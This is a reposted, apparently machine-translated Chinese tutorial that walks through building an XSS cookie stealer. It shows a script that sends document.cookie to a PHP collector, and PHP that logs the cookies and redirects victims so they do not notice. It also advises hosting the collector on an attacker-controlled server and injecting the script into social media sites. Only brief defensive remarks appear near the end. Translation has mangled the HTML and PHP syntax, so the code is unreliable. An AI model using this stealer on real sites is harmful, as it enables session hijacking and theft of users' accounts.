手机版

JS写XSS偷饼干偷密码

时间:2021-09-03 来源:互联网 编辑:宝哥软件园 浏览:

JavaScript是web中最常用的脚本开发语言。js可以自动执行网站组件,管理网站内容,并在web行业中实现其他有用的功能。JS可以有很多功能,可以用于恶意目的,包括窃取包含密码和其他内容的用户cookie。

Cookie是站点请求并维护特定访问页面的信息。Cookie包含身份验证信息,如访问方法、时间、用户名和密码等。当用户访问一个给定的网站时,他们必须使用cookie。如果攻击者可以拦截cookie,他们可以使用cookie从用户那里窃取一些信息。对于特定的域名,JS可以保存或修改用户的cookie。也就是说,如果攻击者可以使用JS查看和修改cookie,那么它就可以成为一种有价值的黑客技术。

基于JS的攻击可以与代码注入等技术有效结合,这些技术可能会导致恶意代码在可信网站上执行。

让我们开始创造XSS偷饼干

步骤1:创建HTML测试页面

首先,创建一个标准的网页

index.html

然后,编辑index.html

Nanoindex.html html body/body/html测试页

步骤2:创建Cookie

创建一个可以插入cookie的基本参数——字符串。此cookie只能在此页面中使用。同样,后续注入也适用于保存在此页面中的所有cookies。

脚本类型=' text/JavaScript ' document . cookie=' username=Null Byte ';/script这个脚本将被插入到HTML的主体部分,如下所示:

如果运行脚本的页面打开,将设置一个cookie,但浏览器中不会显示任何内容。我们可以使用document.write函数直接查看cookie。

document . write(document . cookie);相同功能的脚本如下:

脚本类型=' text/JavaScript ' document . cookie=' username=Null Byte ';document . write(document . cookie);/脚本

在浏览器中打开页面,将出现以下cookie信息:

解释我们成功地为这个页面设置了一个“用户名=空字节”的cookie。

步骤3:用js脚本窃取Cookies

我们用来向服务器传递cookie的js字符串使用document.cookie参数,但是我们使用document.location中定义的url

document . location=' http://127 . 0 . 0 . 1/cookiestealer . PHP?c=' document.cookie在这个例子中,PHP文件位于localhost(127.0.0.1)中。

如果目标是社交媒体网站,需要向网站注入脚本,窃取的cookies应该发送到黑客控制的IP或URL。

将js代码吓到脚本标签中:

脚本类型=' text/JavaScript ' document . location=' http://127 . 0 . 0 . 1/cookiestealer . PHP?c=' document.cookie/scriptHTML页面代码应该如下所示:

剩下的cookie处理需要PHP来处理。

步骤4:用PHP处理Cookies

在上面的例子中,窃取cookie的PHP文件是cookiestealer.php,它位于127.0.0.1网站下。

在实际操作中,不能使用cookiestealer.php这样明显的名字,应该位于外部IP或URL下。

首先,在index.html的同一个目录中创新PHP文件。

纳米cookiestealer.php

需要定义的第一个元素是重定向页面跳转。

?phpheader(' location :https://Google.com ');为了防止用户意识到可能的攻击,最好将用户重定向到同一域中的其他页面,这样用户就不会意识到。

重定向完成后,需要额外的代码来处理cookie。

1.将cookie分配给变量;

$ cookies=$ _ GET 'c2.定义保存cookie的文件,保存该文件的位置由我们控制。

在这个例子中,文件名是log.txt

$file=fopen('log.txt ',' a ');3.将上述两个参数的内容写入日志文件,即将cookie写入log.txt

fwrite($file,$cookies。nn’);代码如下:

然后,您需要为PHP文件准备一个测试环境。

步骤5:测试Cookie窃取程序

在index.html和cookiestealer.php的同一个目录中建立一个PHP测试环境。

php -S 127.0.0.1:80

页面测试成功。

打开页面后,浏览器将被重定向到预定义的网站,即谷歌。

查看php服务器的日志,我们注意到一个参数被传递给了php文件,并执行了PHP代码。

最后,我们可以查看我们网站目录中的log.txt文件来查看cookies。

cat log.txt

日志文件包含cookie,这表明我们已经成功地使用js代码来窃取cookie。

第6:步攻击

Cookies包含重要的用户信息,通常是明文形式,有时甚至包含私钥信息。因此,使用js代码注入来窃取用户的cookies是非常重要的。

攻击可以被注入到任何HTML文件的脚本标签中。检测XSS的常用方法是使用alert。

脚本警报(“警报”);/script此脚本将尝试打开类似于以下内容的警报消息。如果打开,网站很容易受到xss攻击。

在真实的攻击中,黑客特别注意PHP文件的位置。如果处理不好,php文件很容易泄露黑客的位置。如果发生这种攻击,可以根据发送和保存cookie的位置来跟踪黑客。

上面的方法说明了JS作为攻击工具的威力。JS可以让网页更方便。如果一个网站容易被恶意JS注入,就会给用户和网站带来巨大的安全威胁。防止XSS攻击的重担落在了网络开发者身上。如果用户认为网站上运行的脚本不可信,也可以使用NoScript阻止js代码运行。

摘要

以上是边肖介绍的JS编写XSS cookie窃取器窃取密码的步骤的详细说明。希望对大家有帮助。如果你有任何问题,请给我留言,边肖会及时回复你。非常感谢您对我们网站的支持!

版权声明:JS写XSS偷饼干偷密码是由宝哥软件园云端程序自动收集整理而来。如果本文侵犯了你的权益,请联系本站底部QQ或者邮箱删除。